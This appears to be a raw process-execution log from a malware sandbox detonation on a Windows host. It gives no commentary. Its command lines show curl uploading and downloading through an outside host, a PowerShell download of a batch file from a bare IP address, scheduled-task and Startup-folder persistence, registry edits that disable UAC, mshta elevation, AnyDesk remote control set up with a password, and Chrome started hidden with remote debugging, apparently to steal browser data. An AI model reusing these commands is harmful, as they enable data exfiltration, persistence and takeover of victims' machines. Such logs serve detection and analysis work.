"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE7h5o8ADRYV.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe" && pause

C:\Users\Admin\Desktop\Files\pp.exe

"C:\Users\Admin\Desktop\Files\pp.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2332,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2328 /prefetch:2

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2368 /prefetch:3

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1876,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2592 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4532 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7444 -ip 7444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7444 -s 1268

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\twztl.exe

"C:\Users\Admin\Desktop\Files\twztl.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,16251062678635577314,5821821046284277983,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\Files\pornhub_downloader.exe

"C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C2D.tmp\7C2E.tmp\7C2F.bat C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe"

C:\Users\Admin\Desktop\Files\PORNHU~1.EXE

"C:\Users\Admin\Desktop\Files\PORNHU~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8043.tmp\8044.tmp\8045.bat C:\Users\Admin\Desktop\Files\PORNHU~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffcc21146f8,0x7ffcc2114708,0x7ffcc2114718

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\2568621829.exe

C:\Users\Admin\AppData\Local\Temp\2568621829.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\1487223240.exe

C:\Users\Admin\AppData\Local\Temp\1487223240.exe

C:\Users\Admin\AppData\Local\Temp\3020718451.exe

C:\Users\Admin\AppData\Local\Temp\3020718451.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\Files\frap.exe

"C:\Users\Admin\Desktop\Files\frap.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10332 -ip 10332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 768

C:\Users\Admin\Desktop\Files\newfile.exe

"C:\Users\Admin\Desktop\Files\newfile.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\202579613.exe

C:\Users\Admin\AppData\Local\Temp\202579613.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7640 -ip 7640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1292

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

